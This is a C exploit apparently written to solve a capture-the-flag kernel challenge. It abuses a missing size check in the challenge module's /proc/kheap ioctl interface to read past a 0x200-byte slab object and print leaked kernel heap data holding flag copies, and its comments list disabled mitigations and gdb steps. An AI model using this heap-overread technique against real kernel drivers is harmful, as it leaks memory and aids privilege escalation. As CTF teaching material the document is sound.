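/*
 * User-space harness for the /proc/kheap ioctl interface of the CTF
 * challenge module (challenge1.ko, see the notes at the bottom).
 *
 * Sequence: register a 0x200-byte user buffer with CMD_COPY_FROM_USER,
 * issue CMD_COPY_FLAG repeatedly, then ask for 0x1000 bytes back with
 * CMD_COPY_TO_USER and print whatever lies past the first 0x200 bytes.
 * If the driver bounded req.size against the object it allocated for the
 * request, the larger read-back would be rejected; that length check is
 * the kernel-side fix this harness is demonstrating the absence of.
 *
 * Build: gcc exploit.c -o exploit
 */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>

/* ioctl request numbers understood by the module (values as in the original). */
#define CMD_PRINT          22274
#define CMD_COPY_FLAG      22276
#define CMD_COPY_TO_USER   22272
#define CMD_COPY_FROM_USER 22273

/* Request block shared with the module; the layout is the kernel ABI, do not reorder. */
struct kheap_req_t {
    void *ubuf;   /* user buffer the module copies to / from */
    size_t size;  /* number of bytes for the copy */
};

enum {
    BUF_SIZE   = 0x1000, /* full user buffer handed to CMD_COPY_TO_USER */
    SLOT_SIZE  = 0x200,  /* size registered first; one aligned slub slot per the notes below */
    FLAG_ITERS = 0x1000, /* number of CMD_COPY_FLAG calls issued */
};

/* Issue one ioctl on fd and report failure via perror; returns 0 on success, -1 on error. */
static int do_ioctl(int fd, unsigned long cmd, struct kheap_req_t *req)
{
    if (ioctl(fd, cmd, req) < 0) {
        perror("ioctl");
        return -1;
    }
    return 0;
}

int main(void)
{
    int rc = EXIT_FAILURE;
    char buf[BUF_SIZE];
    struct kheap_req_t req = { .ubuf = buf, .size = SLOT_SIZE };

    int fd = open("/proc/kheap", O_RDWR);
    if (fd < 0) {
        perror("open /proc/kheap");
        return rc;
    }

    /* Fill with a recognisable marker so bytes the module never touched stand out. */
    memset(buf, '0', sizeof buf);

    if (do_ioctl(fd, CMD_COPY_FROM_USER, &req) < 0)
        goto out;
    for (int i = 0; i < FLAG_ITERS; i++) {
        if (do_ioctl(fd, CMD_COPY_FLAG, &req) < 0)
            goto out;
    }

    req.size = sizeof buf;
    if (do_ioctl(fd, CMD_COPY_TO_USER, &req) < 0)
        goto out;

    /* buf carries no NUL terminator after the copy; bound the print to the buffer. */
    printf("%.*s", (int)(sizeof buf - SLOT_SIZE), &buf[SLOT_SIZE]);
    rc = EXIT_SUCCESS;

out:
    close(fd);
    return rc;
}

// Protection:
// - No KASLR.
// - CONFIG_SLAB_FREELIST_RANDOM=n
// - CONFIG_SLAB_FREELIST_HARDENED=n
// Debug:
// Use `sudo cat /proc/modules` to get kernel module base.
// gdb> add-symbol-file /challenge/challenge1.ko 0xffffffffc0000000
// gdb> b kheap_open
// gdb> b kheap_ioctl
// An aligned slub slot is 0x200 bytes.
// $ gcc exploit.c -o exploit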